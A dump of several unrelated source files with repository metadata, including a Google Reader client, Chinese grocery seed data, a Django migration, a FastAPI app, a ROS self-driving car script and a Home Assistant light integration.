train_set_y_orig = np.array(train_dataset["train_set_y"][:]) # your train set labels
test_dataset = h5py.File('datasets/test_happy.h5', "r")
test_set_x_orig = np.array(test_dataset["test_set_x"][:]) # your test set features
test_set_y_orig = np.array(test_dataset["test_set_y"][:]) # your test set labels
classes = np.array(test_dataset["list_classes"][:]) # the list of classes
train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))
test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))
return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes
def img_to_encoding(image_path, model):
img1 = cv2.imread(image_path, 1)
img = img1[...,::-1]
img = np.around(np.transpose(img, (2,0,1))/255.0, decimals=12)
x_train = np.array([img])
embedding = model.predict_on_batch(x_train)
return embedding | [
"noreply@github.com"
] | bhanupratapmall.noreply@github.com |
74f064296992ab3766c2c33c72a4130e22c3ea1d | 244351fa728637ccf5d68fa079d1a3e23c7de1e1 | /lib/reader.py | bd18f886f3e1edcb30da01bf4e93f820d829fe3d | [] | no_license | tonicbupt/job | a2d86b1e756b0d97e08dad544890dc54c5330750 | b5c7d19abe243d9dd6b05f309c352bf4891e1f4c | refs/heads/master | 2021-01-16T22:49:10.287609 | 2013-05-10T10:38:57 | 2013-05-10T14:16:52 | 9,370,802 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,205 | py | import logging
from time import time
from urllib import urlencode, quote_plus
from urllib2 import urlopen, Request
LOGIN_URL = 'https://www.google.com/accounts/ClientLogin'
TOKEN_URL = 'https://www.google.com/reader/api/0/token'
SUBSCRIBE_URL = 'https://www.google.com/reader/api/0/subscription/quickadd?output=json'
FEED_URL = 'https://www.google.com/reader/atom/feed'
logger = logging.getLogger(__name__)
class GoogleReader(object):
def __init__(self, email, passwd):
self.email = email
self.passwd = passwd
def login(self):
request = Request(LOGIN_URL, urlencode({
'service': 'reader',
'Email': self.email,
'Passwd': self.passwd,
'source': 'xiaomenco'
}))
try:
f = urlopen(request, timeout=5)
lines = f.read().split()
self.auth = lines[2][5:]
except:
logger.info('login to GoogleReader fail')
return False
return True
def get_token(self):
headers = {'Authorization': 'GoogleLogin auth=' + self.auth}
request = Request(TOKEN_URL, headers=headers)
try:
f = urlopen(request, timeout=5)
token = f.read()
self.token = token
except:
logger.info('get token error.')
return None
return token
def subscribe(self, feed):
headers = {'Authorization': 'GoogleLogin auth=' + self.auth}
request = Request(SUBSCRIBE_URL, urlencode({
'quickadd': feed,
'T': self.get_token()}), headers=headers)
try:
f = urlopen(request, timeout=5)
return f.read()
except:
logger.info('subscribe %s error' % feed)
return None
def get_feed(self, feed, num=100):
headers = {'Authorization': 'GoogleLogin auth=' + self.auth}
request = Request(FEED_URL + \
quote_plus('/' + feed) + \
'?n=%d' % num, headers=headers)
try:
f = urlopen(request, timeout=10)
return f.read()
except:
logger.info('get feed %s error' %feed)
return None
| [
"luoruici@gmail.com"
] | luoruici@gmail.com |
e5e74bb27ddcfe5e7ca2a7c60497d32bee026cdd | 3aac637c59acc0427fa047212ad601f30760ecc4 | /add_goods/goods.py | 61fa63baaa202929ceb234185a2ddb7c47089216 | [] | no_license | hzlpypy/fruit_item | c684d934f3e8da97445431e8ef0bcbfcef4152b0 | 103a95c0ddc9488815701e99a37d418a552d2402 | refs/heads/master | 2022-12-12T03:21:21.133021 | 2018-07-22T15:28:47 | 2018-07-22T15:28:47 | 137,031,362 | 2 | 1 | null | 2022-11-22T02:34:23 | 2018-06-12T07:07:56 | Python | UTF-8 | Python | false | false | 19,956 | py | # -*- coding: utf-8 -*-
__author__ = 'hzl'
__date__ = '202018/7/11 22:31'
row_data = [
{
"id": 1,
"title": "新鲜水果",
"judgefruit": "model01",
"banner": "banner/2018/06/banner01.jpg",
"createtime": "20180609 031700",
"isDelete": "1",
"fruit": [
{
"id": 1,
"gid_id": 1,
"gtitle": "草莓",
"gtype": "时令水果",
"gprice": "30.00",
"gimg": "uploads/2018/06/goods003.jpg",
"ginfo": "草莓浆果柔软多汁,味美爽口,适合速冻保鲜贮藏。草莓速冻后,可以保持原有的色、香、味,既便于贮藏,又便于外销。",
"gdetailed": "<p>草莓采摘园位于北京大兴区 庞各庄镇四各庄村 ,每年1月-6月面向北京以及周围城市提供新鲜草莓采摘和精品礼盒装草莓,草莓品种多样丰富,个大香甜。所有草莓均严格按照有机标准培育,不使用任何化肥和农药。草莓在采摘期间免洗可以直接食用。欢迎喜欢草莓的市民前来采摘,也欢迎各大单位选购精品有机草莓礼盒,有机草莓礼盒是亲朋馈赠、福利送礼的最佳选择。</p>",
"gcommon": "<p>感觉一般般啦</p>\r\n<p>还没自己种的好吃</p>\r\n<p>超级棒的</p>\r\n<p>哟哦哦哦哦哦哦</p>",
"gsalesvolume": 30,
"gevaluate": "真的好吃",
"addtime": "20180609 ",
"a_updatetime": "20180609 031900",
"isDelete": "1"
},
{
"id": 2,
"gid_id": 1,
"gtitle": "葡萄",
"gtype": "时令水果",
"gprice": "14.11",
"gimg": "uploads/2018/06/goods002.jpg",
"ginfo": "精选召唤师峡谷红BUFF葡萄",
"gdetailed": "<p>鲜嫩可口.入口即化,真的好吃</p>",
"gcommon": "<p>假葡萄</p>\r\n<p>塑料葡萄</p>\r\n<p>超级难吃</p>",
"gsalesvolume": 21,
"gevaluate": "好吃个P",
"addtime": "20180609 ",
"a_updatetime": "20180609 032000",
"isDelete": "1"
},
{
"id": 3,
"gid_id": 1,
"gtitle": "柠檬",
"gtype": "时令水果",
"gprice": "15.11",
"gimg": "uploads/2018/06/goods001.jpg",
"ginfo": "1",
"gdetailed": "<p>ID分开来放大后可获得法律和的方式来回复带回来的方式离开的身份号莲富大厦良好</p>",
"gcommon": "<p>假的吧</p>\r\n<p>真TM酸</p>\r\n<p>吃个蛋</p>\r\n<p>全是坏的</p>\r\n<p>千万不要买</p>",
"gsalesvolume": 54,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032000",
"isDelete": "1"
},
{
"id": 4,
"gid_id": 1,
"gtitle": "奇异果",
"gtype": "时令水果",
"gprice": "25.80",
"gimg": "uploads/2018/06/goods012.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 24,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032100",
"isDelete": "1"
}
],
"classify": [
{
"id": 1,
"sid_id": 1,
"infoname": "鲜芒",
"create_time": "20180609 093000",
"is_delete": "1"
},
{
"id": 2,
"sid_id": 1,
"infoname": "加州提子",
"create_time": "20180609 093000",
"is_delete": "1"
},
{
"id": 3,
"sid_id": 1,
"infoname": "亚马逊牛油果",
"create_time": "20180609 093100",
"is_delete": "1"
}
]
},
{
"id": 2,
"title": "海鲜产品",
"judgefruit": "model02",
"banner": "banner/2018/06/banner02.jpg",
"createtime": "20180609 031700",
"isDelete": "1",
"fruit": [
{
"id": 5,
"gid_id": 2,
"gtitle": "青岛野生海捕大青虾",
"gtype": "海鲜盛宴",
"gprice": "48.00",
"gimg": "uploads/2018/06/goods018.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 33,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032100",
"isDelete": "1"
},
{
"id": 6,
"gid_id": 2,
"gtitle": "扇贝",
"gtype": "海鲜盛宴",
"gprice": "46.00",
"gimg": "uploads/2018/06/goods019.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 41,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032200",
"isDelete": "1"
},
{
"id": 7,
"gid_id": 2,
"gtitle": "冷冻秋刀鱼",
"gtype": "海鲜盛宴",
"gprice": "19.00",
"gimg": "uploads/2018/06/goods020.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 52,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032200",
"isDelete": "1"
},
{
"id": 8,
"gid_id": 2,
"gtitle": "基围虾",
"gtype": "海鲜盛宴",
"gprice": "25.00",
"gimg": "uploads/2018/06/goods021.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 84,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032200",
"isDelete": "1"
}
],
"classify": [
{
"id": 4,
"sid_id": 2,
"infoname": "河虾",
"create_time": "20180609 093100",
"is_delete": "1"
},
{
"id": 5,
"sid_id": 2,
"infoname": "扇贝",
"create_time": "20180609 093100",
"is_delete": "1"
}
]
},
{
"id": 3,
"title": "猪牛羊肉",
"judgefruit": "model03",
"banner": "banner/2018/06/banner03.jpg",
"createtime": "20180609 031800",
"isDelete": "1",
"fruit": [
{
"id": 9,
"gid_id": 3,
"gtitle": "大肥肉",
"gtype": "新鲜特供",
"gprice": "38.00",
"gimg": "uploads/2018/06/goods013.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 24,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032300",
"isDelete": "1"
},
{
"id": 10,
"gid_id": 3,
"gtitle": "小肥肉",
"gtype": "新鲜特供",
"gprice": "24.00",
"gimg": "uploads/2018/06/goods002_kpZtUs0.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 12,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032400",
"isDelete": "1"
},
{
"id": 11,
"gid_id": 3,
"gtitle": "全都是肥柚",
"gtype": "新鲜特供",
"gprice": "45.00",
"gimg": "uploads/2018/06/goods009.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 15,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032400",
"isDelete": "1"
},
{
"id": 12,
"gid_id": 3,
"gtitle": "小鲜肉",
"gtype": "新鲜特供",
"gprice": "1.00",
"gimg": "uploads/2018/06/goods006_x6DhaaZ.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 8,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032400",
"isDelete": "1"
},
{
"id": 13,
"gid_id": 3,
"gtitle": "老肥柚",
"gtype": "新鲜特供",
"gprice": "88.00",
"gimg": "uploads/2018/06/goods001_wWUBBCC.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 77,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032500",
"isDelete": "1"
}
],
"classify": [
{
"id": 6,
"sid_id": 3,
"infoname": "猪肉",
"create_time": "20180609 093100",
"is_delete": "1"
},
{
"id": 7,
"sid_id": 3,
"infoname": "牛肉",
"create_time": "20180609 093100",
"is_delete": "1"
},
{
"id": 8,
"sid_id": 3,
"infoname": "羊肉",
"create_time": "20180609 093100",
"is_delete": "1"
}
]
},
{
"id": 4,
"title": "禽类食品",
"judgefruit": "model04",
"banner": "banner/2018/06/banner04.jpg",
"createtime": "20180609 031800",
"isDelete": "1",
"fruit": [
{
"id": 14,
"gid_id": 4,
"gtitle": "小鸡蛋",
"gtype": "原地出产",
"gprice": "22.00",
"gimg": "uploads/2018/06/goods006.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 62,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032500",
"isDelete": "1"
},
{
"id": 15,
"gid_id": 4,
"gtitle": "大鹅蛋",
"gtype": "原地出产",
"gprice": "11.00",
"gimg": "uploads/2018/06/goods004.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 258,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032700",
"isDelete": "1"
},
{
"id": 16,
"gid_id": 4,
"gtitle": "高邮咸鸭蛋",
"gtype": "原地出产",
"gprice": "15.21",
"gimg": "uploads/2018/06/goods006_XJVNYkB.jpg",
"ginfo": "1",
"gdetailed": "1",
"gcommon": null,
"gsalesvolume": 424,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 032900",
"isDelete": "1"
},
{
"id": 17,
"gid_id": 4,
"gtitle": "虎皮蛋",
"gtype": "原地出产",
"gprice": "25.83",
"gimg": "uploads/2018/06/goods003_mo3wCLB.jpg",
"ginfo": "1",
"gdetailed": "<p>1</p>",
"gcommon": null,
"gsalesvolume": 365,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 033000",
"isDelete": "1"
}
],
"classify": [
{
"id": 9,
"sid_id": 4,
"infoname": "鸡蛋",
"create_time": "20180609 093200",
"is_delete": "1"
},
{
"id": 10,
"sid_id": 4,
"infoname": "鸭蛋",
"create_time": "20180609 093200",
"is_delete": "1"
}
]
},
{
"id": 5,
"title": "新鲜蔬菜",
"judgefruit": "model05",
"banner": "banner/2018/06/banner05.jpg",
"createtime": "20180609 031800",
"isDelete": "1",
"fruit": [
{
"id": 18,
"gid_id": 5,
"gtitle": "小白菜",
"gtype": "绿色有机",
"gprice": "12.19",
"gimg": "uploads/2018/06/goods001_QMqCXg1.jpg",
"ginfo": "1",
"gdetailed": "<p>1</p>",
"gcommon": null,
"gsalesvolume": 87,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 033000",
"isDelete": "1"
},
{
"id": 19,
"gid_id": 5,
"gtitle": "大白菜",
"gtype": "绿色有机",
"gprice": "22.30",
"gimg": "uploads/2018/06/goods005.jpg",
"ginfo": "1",
"gdetailed": "<p>1</p>",
"gcommon": null,
"gsalesvolume": 274,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 033100",
"isDelete": "1"
},
{
"id": 20,
"gid_id": 5,
"gtitle": "小菠菜",
"gtype": "绿色有机",
"gprice": "14.14",
"gimg": "uploads/2018/06/goods006_VdcpgNq.jpg",
"ginfo": "1",
"gdetailed": "<p>1</p>",
"gcommon": null,
"gsalesvolume": 255,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 033100",
"isDelete": "1"
},
{
"id": 21,
"gid_id": 5,
"gtitle": "大菠菜",
"gtype": "绿色有机",
"gprice": "15.66",
"gimg": "uploads/2018/06/goods005_U6YcfAV.jpg",
"ginfo": "1",
"gdetailed": "<p>1</p>",
"gcommon": null,
"gsalesvolume": 354,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 033100",
"isDelete": "1"
}
],
"classify": [
{
"id": 11,
"sid_id": 5,
"infoname": "进口大白菜",
"create_time": "20180609 093200",
"is_delete": "1"
},
{
"id": 12,
"sid_id": 5,
"infoname": "非洲白菜",
"create_time": "20180609 093200",
"is_delete": "1"
}
]
},
{
"id": 6,
"title": "速冻食品",
"judgefruit": "model06",
"banner": "banner/2018/06/banner06.jpg",
"createtime": "20180609 031800",
"isDelete": "1",
"fruit": [
{
"id": 25,
"gid_id": 6,
"gtitle": "冻冬瓜",
"gtype": "酷爽冰品",
"gprice": "17.88",
"gimg": "uploads/2018/06/QQ截图20180609162721_OENEYjK.jpg",
"ginfo": "疏忽或或或或或",
"gdetailed": "<p>发的发送到发送到</p>",
"gcommon": "<p>感觉还不错,挺新鲜</p>\r\n<p>还可以吧</p>\r\n<p>超级好吃</p>\r\n<p>真的好吃</p>",
"gsalesvolume": 555,
"gevaluate": "垃圾",
"addtime": "20180621 ",
"a_updatetime": "20180621 093000",
"isDelete": "1"
},
{
"id": 22,
"gid_id": 6,
"gtitle": "速冻鱼肉",
"gtype": "酷爽冰品",
"gprice": "48.00",
"gimg": "uploads/2018/06/u42799109431372834422fm27gp0.jpg",
"ginfo": "1",
"gdetailed": "<p>1</p>",
"gcommon": null,
"gsalesvolume": 154,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 033200",
"isDelete": "1"
},
{
"id": 23,
"gid_id": 6,
"gtitle": "冻草莓",
"gtype": "酷爽冰品",
"gprice": "25.80",
"gimg": "uploads/2018/06/goods02.jpg",
"ginfo": "1",
"gdetailed": "<p>1</p>",
"gcommon": null,
"gsalesvolume": 247,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 033200",
"isDelete": "1"
},
{
"id": 24,
"gid_id": 6,
"gtitle": "冻西瓜",
"gtype": "酷爽冰品",
"gprice": "48.00",
"gimg": "uploads/2018/06/QQ截图20180609162639.jpg",
"ginfo": "1",
"gdetailed": "<p>55454545</p>",
"gcommon": null,
"gsalesvolume": 147,
"gevaluate": "1",
"addtime": "20180609 ",
"a_updatetime": "20180609 033400",
"isDelete": "1"
}
],
"classify": [
{
"id": 13,
"sid_id": 6,
"infoname": "棒棒冰",
"create_time": "20180609 093200",
"is_delete": "1"
},
{
"id": 14,
"sid_id": 6,
"infoname": "雪糕",
"create_time": "20180609 093300",
"is_delete": "1"
},
{
"id": 15,
"sid_id": 6,
"infoname": "皮雪糕",
"create_time": "20180609 093300",
"is_delete": "1"
}
]
}
] | [
"1761784585@qq.com"
] | 1761784585@qq.com |
affdfdca4df458dc05df4ffdb2bae1a067555c0c | 494292f45ede093c587210cead4930f585850610 | /mblog/mainsite/migrations/0005_post_price.py | 77052b5e96700f344f59421cbc39e4e72c2c840d | [] | no_license | 22836252/myfirstdjungo | a3af559c6cf46d1efef2e3e48fb535d11e96fe1b | 92d47f2f00cb97bbb5125a7f92de85b54ef2578e | refs/heads/master | 2021-09-24T09:54:04.394797 | 2020-02-19T11:26:55 | 2020-02-19T11:26:55 | 241,576,657 | 0 | 0 | null | 2021-09-22T18:36:02 | 2020-02-19T09:03:27 | HTML | UTF-8 | Python | false | false | 409 | py | # Generated by Django 3.0.3 on 2020-02-19 08:38
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('mainsite', '0004_post_abstract'),
]
operations = [
migrations.AddField(
model_name='post',
name='price',
field=models.DecimalField(decimal_places=2, default=0, max_digits=16),
),
]
| [
"ken99899@gmail.com"
] | ken99899@gmail.com |
7e5c981732770ef9f5f9c5bda7000c85ed4abc84 | c0a968aed0abfe27970a0f0aac25905bedf9d794 | /main.py | 72cb13f3943793804f7a760764788a39652d8bdb | [
"MIT"
] | permissive | MikeTovar13/habi-back | b3181527284dae19725346f8d2fa15215c2ff40d | 724416f8675dde8cef4fe90b6a3e8fc5bbf3b706 | refs/heads/master | 2023-05-12T05:54:18.241539 | 2021-06-08T01:47:38 | 2021-06-08T01:47:38 | 374,259,800 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 745 | py | from fastapi import FastAPI
import uvicorn
from routes.v1.inmuebles import inmueblesApp
from routes.v1.propietario import propietarioApp
from routes.v1.utils import utilsApp
from fastapi.middleware.cors import CORSMiddleware
# Routes de servicios
app = FastAPI(title="Habi Backend", version="1.0.0")
app.include_router(inmueblesApp, prefix="/v1/inmueble")
app.include_router(propietarioApp, prefix="/v1/propietario")
app.include_router(utilsApp, prefix="/v1/utils")
# Cors Allowed
origins = ["*"]
app.add_middleware(
CORSMiddleware,
allow_origins=origins,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
# Inicio de ejecucion
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=8080)
| [
"ferney.tovar13@gmail.com"
] | ferney.tovar13@gmail.com |
4724ac93de9f54661e9f2dc8f537ce5ca3865711 | c9670c1e205fe341d70d77098195880c86026fe3 | /sec_dl/utils/monitor_scraper_progress.py | 48cbb7b80d7692319a9cb6b9ca25b3ac136513ad | [
"MIT"
] | permissive | Peppershaker/sec_dl | 09698cdebba5249ed1da79deb0daa69982b71d91 | 30f0176409c8189fa223637e9734904d8ac94001 | refs/heads/master | 2023-05-25T01:13:04.396579 | 2019-07-03T16:59:00 | 2019-07-03T16:59:00 | 194,985,731 | 0 | 0 | null | 2023-05-22T22:29:17 | 2019-07-03T05:31:17 | Python | UTF-8 | Python | false | false | 1,047 | py | import time
from scrape_all_filings import connect_db
from datetime import datetime
def get_rows_left():
rows_left = session.query(filings.c.filing_id, filings.c.path).filter(filings.c.text == None).count()
return rows_left
engine, metadata, Session, session, connection, filings = connect_db()
start_time = datetime.now()
rows_left_at_start = get_rows_left()
print("Waiting to collect data")
time.sleep(10)
if __name__ == "__main__":
while True:
current_time = datetime.now()
time_elapsed = current_time - start_time
rows_left = get_rows_left()
rows_completed_since_start = rows_left_at_start - rows_left
seconds_per_iteration = time_elapsed.seconds / rows_completed_since_start
mins_left = rows_left * seconds_per_iteration / 60
print("Update On {}".format(datetime.now()))
print("{} rows left, {:.2f} minutes to go".format(rows_left, mins_left ))
print()
start_time = current_time
rows_left_at_start = rows_left
time.sleep(5*60)
| [
"victor.c.xu@gmail.com"
] | victor.c.xu@gmail.com |
e87310d62a78bfd785c1e61cc00290c6081c3f3d | d75d07abd97b863344801c95ca776139eee5d7a9 | /src/sample/stopline_test.py | 8b76c7e6ae4c6c0f1dcc02c8ed2165467dde3468 | [] | no_license | kbs907/programmers_final_competition | f15be51f1039fc1026322c7d508195c4ac48abfb | d1f9e212358d23f3b5fe489eeddd18065b744921 | refs/heads/master | 2023-09-02T23:15:09.174036 | 2021-10-19T08:31:37 | 2021-10-19T08:31:37 | 400,005,766 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,018 | py | #! /usr/bin/env python
# -*- coding:utf-8 -*-
### 필요한 모듈 import ###
import rospy, rospkg, time, sys, os
import numpy as np
import cv2, random, math
from cv_bridge import CvBridge, CvBridgeError
from xycar_msgs.msg import xycar_motor
from sensor_msgs.msg import Image, LaserScan
from std_msgs.msg import Int32MultiArray
from darknet_ros_msgs.msg import BoundingBoxes
from visualization_msgs.msg import Marker, MarkerArray
from ar_track_alvar_msgs.msg import AlvarMarkers
from tf.transformations import euler_from_quaternion
from image_processing_module import *
from yolo_module import *
from drive_module import *
from ultra_module import *
from ar_module import *
from lidar_module import *
### module 사용을 위한 전역 변수 ###
global imageProcessModule
global yoloModule
global driveModule
global ultraModule
global arModule
### main 전역 변수 ###
global find_stopline # 정지선 찾기 on/off
global find_traffic # 신호 찾기 on/off
global find_ar
global do_T_parking
global do_yolo_stop
global mode
global cut_in
global class_name
def init():
## 변수, 발행자, 구독자 선언
global imageProcessModule
global yoloModule
global driveModule
global ultraModule
global arModule
global lidarModule
global find_stopline # 정지선 찾기 on/off
global find_traffic # 신호 찾기 on/off
global find_ar
global do_T_parking
global do_yolo_stop
global mode
global cut_in
global yolo_person
global class_name
imageProcessModule = ImageProcessingModule()
yoloModule = YoloModule()
driveModule = DriveModule()
ultraModule = UltraModule()
arModule = ArModule()
lidarModule = LidarModule()
find_stopline = True#False # 정지선 찾기 on/off
find_traffic = True#False #True # 신호 찾기 on/off
find_ar = True
do_T_parking = False
do_yolo_stop = True#False
mode = '2'
cut_in = True
yolo_person = True
class_name = 'person'
rospy.init_node('main')
rospy.Subscriber("/usb_cam/image_raw", Image, img_callback)
rospy.Subscriber('xycar_ultrasonic', Int32MultiArray, ultra_callback)
rospy.Subscriber('ar_pose_marker', AlvarMarkers, ar_callback)
rospy.Subscriber('scan', LaserScan, lidar_callback)
rospy.Subscriber("/darknet_ros/bounding_boxes", BoundingBoxes, yolo_callback)
def sensor_check():
global imageProcessModule
global ultraModule
while True :
if imageProcessModule.get_image_size() != (640*480*3) :
continue
if not ultraModule.get_data() :
continue
if not lidarModule.get_data() :
continue
break
### 구독자 callback 함수들 ###
def img_callback(data):
global imageProcessModule
imageProcessModule.set_image(data)
def ultra_callback(data) :
global ultraModule
ultraModule.set_data(data)
def ar_callback(data):
global arModule
arModule.set_arData(data)
def lidar_callback(data):
global lidarModule
lidarModule.set_lidarData(data)
def yolo_callback(data):
global yoloModule
yoloModule.set_boxdata(data)
if __name__ == '__main__':
init()
sensor_check()
print('==============')
print('= mode 1 =')
print('==============')
while not rospy.is_shutdown():
global imageProcessModule
global yoloModule
global driveModule
global ultraModule
global find_stopline
global find_traffic
global find_ar
global do_T_parking
global do_yolo_stop
global mode
global cut_in
global class_name
mode = '7'
print("MODE: " + mode)
cte, fail_count = imageProcessModule.get_cte()
angle, speed = driveModule.Hough_drive(cte, fail_count) # 기본 주행
#print ('imageProcessModule.get_corner_count', imageProcessModule.get_corner_count())
if mode == '1' : #시작~교차로 전
speed = 30 #30
if find_traffic :
if not imageProcessModule.get_traffic_light('first') :
angle, speed = 0, 0
else :
find_traffic = False
elif cut_in :
speed, cut_in = driveModule.cut_in(imageProcessModule.get_road_width(), ultraModule.get_data())
else : # 일반 주행
speed = 20
if imageProcessModule.get_corner_count() == 1 :
mode = '2'
find_stopline = True # 교차로 진입 전이므로 정지선 찾기 on
find_traffic = True # 신호 찾기 on
print('==============')
print('= mode 2 =')
print('==============')
elif mode == '2' : # 교차로
#print('ardata : ', arModule.get_ardata())
#find_stopline, find_traffic = False, False
speed = 15
if find_stopline :
if imageProcessModule.detect_stopline() : # 정지선 찾아야 할 때
driveModule.stop_nsec(1) # 1초 정차
find_stopline = False
elif find_traffic :
if not imageProcessModule.get_traffic_light('second') :
angle, speed = driveModule.stop()
else :
find_traffic = False
elif find_ar and arModule.is_ar():
print(arModule.get_distance())
find_ar = False
do_T_parking = True
elif do_T_parking:
driveModule.start_T_parking()
driveModule.T_parking(arModule.get_distance(), arModule.get_arctan())
'''
if not arModule.finish_T_parking():
while arModule.finish_T_parking():
print('again T parking')
driveModule.again_T_parking(arModule.get_distance(), arModule.get_arctan())
'''
driveModule.end_T_parking(arModule.get_arctan())
do_T_parking = False
intersec = imageProcessModule.get_corner_count()
else :
yolo_size = yoloModule.get_size(class_name)
#print('yolo_size: ', yolo_size)
if do_yolo_stop and yolo_size != None :
print('***** start yolo drive *****')
do_yolo_stop, class_name = driveModule.yolo_drive(angle, class_name, yolo_size)
if not do_yolo_stop and imageProcessModule.get_corner_count() - intersec > 2 : # 교차로 진입
find_stopline = True
mode = '3'
elif mode == '3' : # 교차로이후 ~ 언덕 전
speed = 15
if imageProcessModule.detect_slope() :
driveModule.slope_drive(angle) #언덕 주행
mode = '4'
elif mode == '4' : # 언덕이후~ 로터리전
if find_stopline :
speed = 15
if imageProcessModule.detect_stopline() : # 정지선 찾아야 할 때
driveModule.stop_nsec(1) # 1초 정차
find_stopline = False
print('stopline!')
else :
if lidarModule.can_rotary_in() : #로터리 진입 가능하면
mode = '5'
else :
speed = 0
elif mode == '5' : # 로터리
if lidarModule.forward_obstacle() :
speed = 0
print(lidarModule.get_data())
if lidarModule.end_rotary() : # 주차 ar태그 pose로 판단 또는 차선으로
mode = '6'
elif mode == '6' : # 장애물 회피
speed = 10
lpos, rpos = imageProcessModule.get_lane_pos()
angle = yoloModule.car_avoid(lpos, rpos)
print(arModule.get_distance())
if 1.3 < arModule.get_distance() < 1.5 : # ex) 주차 ar태그 pose로 판단
mode = '7'
find_stopline = True
else :
if find_stopline :
if imageProcessModule.detect_stopline_final() :
driveModule.stop_nsec(1)
find_stopline = False
find_traffic = True
elif find_traffic :
speed = 0
if imageProcessModule.get_traffic_light('first') :
find_traffic = False
else :
if imageProcessModule.detect_parkinglot() :
driveModule.stop_nsec(1)
if not ultraModule.right_obstacle() :
driveModule.parallel_parking()
driveModule.stop_nsec(1)
print('##### finish! #####')
break
driveModule.drive(angle, speed)
| [
"kbs907@naver.com"
] | kbs907@naver.com |
26b37fb1f6de95098a60273063f8127dfa9cd6ee | 9e335834e7be81068f001d5451781d5c1530ebbf | /LearnPythonTHW/ex15.py | bf759b93985340432ebf224960e5e9315db9f325 | [] | no_license | jtr109/SelfLearning | c1dbffa5485d0cd2f444ea510da62a8e3d269dbc | cc920ed507647762b9855385be76869adac89e7c | refs/heads/master | 2020-04-06T04:11:31.143688 | 2016-07-22T02:19:39 | 2016-07-22T02:19:39 | 58,049,867 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 268 | py | # -*- coding: utf-8 -*-
from sys import argv
script, filename = argv
txt = open(filename)
print "Here's your file %r:" % filename
print txt.read()
print "Type the filename again:"
file_again = raw_input("> ")
txt_again = open(file_again)
print txt_again.read()
| [
"lyp_login@outlook.com"
] | lyp_login@outlook.com |
eb5f2cf86ec088fe0044bbd729282c46ce185b5e | eb64b799ff1d7ef3a244bf8e6f9f4e9118d5cfcd | /homeassistant/components/freedompro/light.py | 95731da914e47175459ea54202f980d23b6451cc | [
"Apache-2.0"
] | permissive | JeffLIrion/home-assistant | 53966b81b5d5816679f12fc761f79e8777c738d6 | 8f4ec89be6c2505d8a59eee44de335abe308ac9f | refs/heads/dev | 2023-08-22T09:42:02.399277 | 2022-02-16T01:26:13 | 2022-02-16T01:26:13 | 136,679,169 | 5 | 2 | Apache-2.0 | 2023-09-13T06:59:25 | 2018-06-09T00:58:35 | Python | UTF-8 | Python | false | false | 4,138 | py | """Support for Freedompro light."""
import json
from pyfreedompro import put_state
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_HS_COLOR,
COLOR_MODE_BRIGHTNESS,
COLOR_MODE_HS,
COLOR_MODE_ONOFF,
LightEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_API_KEY
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers import aiohttp_client
from homeassistant.helpers.entity import DeviceInfo
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.update_coordinator import CoordinatorEntity
from .const import DOMAIN
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up Freedompro light."""
api_key = entry.data[CONF_API_KEY]
coordinator = hass.data[DOMAIN][entry.entry_id]
async_add_entities(
Device(hass, api_key, device, coordinator)
for device in coordinator.data
if device["type"] == "lightbulb"
)
class Device(CoordinatorEntity, LightEntity):
